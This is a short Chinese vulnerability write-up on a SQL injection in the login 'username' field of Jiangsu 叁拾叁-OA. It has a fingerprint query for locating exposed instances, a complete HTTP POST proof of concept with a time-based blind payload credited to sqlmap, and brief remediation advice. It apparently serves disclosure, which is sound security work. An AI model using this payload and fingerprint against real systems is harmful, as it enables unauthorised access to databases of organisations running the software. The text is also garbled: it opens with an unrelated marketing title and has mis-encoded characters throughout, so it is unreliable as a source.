企業(yè)網(wǎng)站怎么自適應網(wǎng)站推廣的營銷策劃方案
0x01 漏洞介紹
江蘇叁拾叁-OA是由江蘇叁拾叁信息技術有限公司開發(fā)的一款OA辦公平臺,主要有知識管理,工作流程,溝通交流,輔助辦公,集成解決方案,應用支撐平臺,基礎支撐等功能。 該系統(tǒng)也與江蘇叁拾叁智慧農(nóng)業(yè)研究院的農(nóng)產(chǎn)品電商解決方案、社會化服務解決方案、鄉(xiāng)村振興解決方案等進行了深度融合。該漏洞存在于login下,username對接受的傳參沒有進行嚴格的過濾,從而導致SQL注入,攻擊者可以利用該漏洞獲取數(shù)據(jù)庫敏感信息。
0x02 影響版本
江蘇叁拾叁-OA
0x03 語法特征
app="江蘇叁拾叁-OA"
0x04 漏洞復現(xiàn)
頁面
?
POC(payload sqlmap梭哈來的)
POST /login HTTP/1.1
Host:
Content-Length: 93
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closeusername=admin' AND (SELECT 9415 FROM (SELECT(SLEEP(4)))QBMI) AND 'AUxO'='AUxO&password=admin
直接sqlmap梭哈來
?
0x05 漏洞修復建議
使用參數(shù)化查詢
對用戶輸入進行驗證和過濾
限制數(shù)據(jù)庫賬戶權限
更新和打補丁